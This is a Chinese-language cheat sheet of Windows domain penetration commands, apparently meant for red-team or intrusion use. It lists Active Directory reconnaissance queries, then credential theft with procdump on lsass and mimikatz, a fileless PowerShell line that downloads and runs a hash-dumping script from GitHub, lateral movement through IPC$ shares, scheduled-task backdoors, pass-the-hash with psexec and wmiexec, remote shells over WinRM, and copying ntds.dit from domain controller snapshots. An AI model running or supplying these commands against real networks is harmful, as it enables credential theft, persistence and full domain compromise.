域渗透常用基础命令

信息收集基础命令

查询与控制器主机名

net group "domain controllers" /domain

ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "OU=Domain Controllers,DC=test,DC=com" -w Uu1234. "(sAMAccountType=805306369)"|grep dNSHostName

查询域管理用户

net group "domain admins" /domain

ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "CN=Domain Admins,CN=users,DC=test,DC=com" -w Uu1234. "(member=*)"|grep member:

查看所有域用户

net user /domain

ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "CN=Users,DC=test,DC=com" -w Uu1234. "(sAMAccountType=805306368)"|grep sAMAccountName

查看加入域的所有计算机名

net group "domain computers" /domain

ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "CN=Computers,DC=test,DC=com" -w Uu1234. "(sAMAccountType=805306369)"|grep dNSHostName

查看域密码策略

net accounts /domain

查看域信任关系

nltest /domain_trusts /all_trusts /v /server:xx.xx.xx.xx

powershell ([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest','test.com')))).GetAllTrustRelationships()

ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "DC=test,DC=com" -w Uu1234. "(objectClass=trustedDomain)"|grep trustPartner:

查看信任方向

ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "DC=test,DC=com" -w Uu1234. "(objectClass=trustedDomain)"|grep trustDirection:

1	2	3
受信任的域信任主域执行操作	主域信任受信任的域执行操作	相互信任

在nltest中

Inbound	Outbound
受信任的域信任主域执行操作	主域信任受信任的域执行操作

定位exchange服务器

ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "CN=Exchange Servers,OU=Microsoft Exchange Security Groups,DC=test,DC=com" -w Uu1234. "(sAMAccountType=268435456)"|grep member

setspn -q exchangemdb/*

定位adcs服务

ldapsearch -x -H ldap://192.168.164.146 -D "user1@test.com" -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=test,DC=com" -w Uu1234. "(objectCategory=pKIEnrollmentService)"|grep dNSHostName

常用工具

使用procdump将目标的lsass.exe转储成dmp文件

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

使用mimikatz从转储的lsass.dmp中来读取明文密码

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"

使用powershell无文件落地

powershell IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1’);Get-PassHashes

利用ipc$链接获得shell

net use \192.168.91.131\IPC$ /user:"administrator" "abc@123"
copy D:\test.bat \192.168.91.131\c$

计划任务后门

schtasks /create /s 192.168.91.131 /u Administrator /p Admin@123.. /ru "SYSTEM" /tn test /sc DAILY /st 22:18 /tr C:\windows\temp\test.bat /F

创建计划任务，/tn是任务名称，/sc是任务运行频率，这里指定为每天运行， /tr指定运行的文件，/F表示强制创建任务 /i表示立即执行

使用psexec

psexec.exe admin@10.73.147.30 -hashes 624aac413795cdc1a5c7b1e00f780017:852a844adfce18f66009b4f14e0a98de -accepteula

python psexec.py administrator@10.73.147.29 -hashes 624aac413795cdc1a5c7b1e00f780017:852a844adfce18f66009b4f14e0a98de

python psexec.py  domain.com/administrator:password@10.73.147.29

wmiexec

python wmiexec.py -hashes 624aac413795cdc1a5c7b1e00f780017:852a844adfce18f66009b4f14e0a98de administrator@10.73.147.29

wmic /node:10.73.147.29 /user:Administrator /password:Admin@123.. process call create "cmd.exe /c ipconfig"

winrm

winrs -r:http://10.73.147.29:5985 -u:Administrator -p:Admin@123.. "whoami /all"

winrs -r:http://10.73.147.29:5985 -u:Administrator -p:Admin@123.. "cmd.exe"

在域控导出hash
创建快照

ntdsutil snapshot "activate instance ntds" create quit quit

加载快照

ntdsutil snapshot "mount {72ba82f0-5805-4365-a73c-0ccd01f5ed0d}" quit quit

Copy文件副本

copy C:\$SNAP_201911211122_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit

卸载删除快照

ntdsutil snapshot "unmount {72ba82f0-5805-4365-a73c-0ccd01f5ed0d}" quit quit
ntdsutil snapshot "delete {72ba82f0-5805-4365-a73c-0ccd01f5ed0d}" quit quit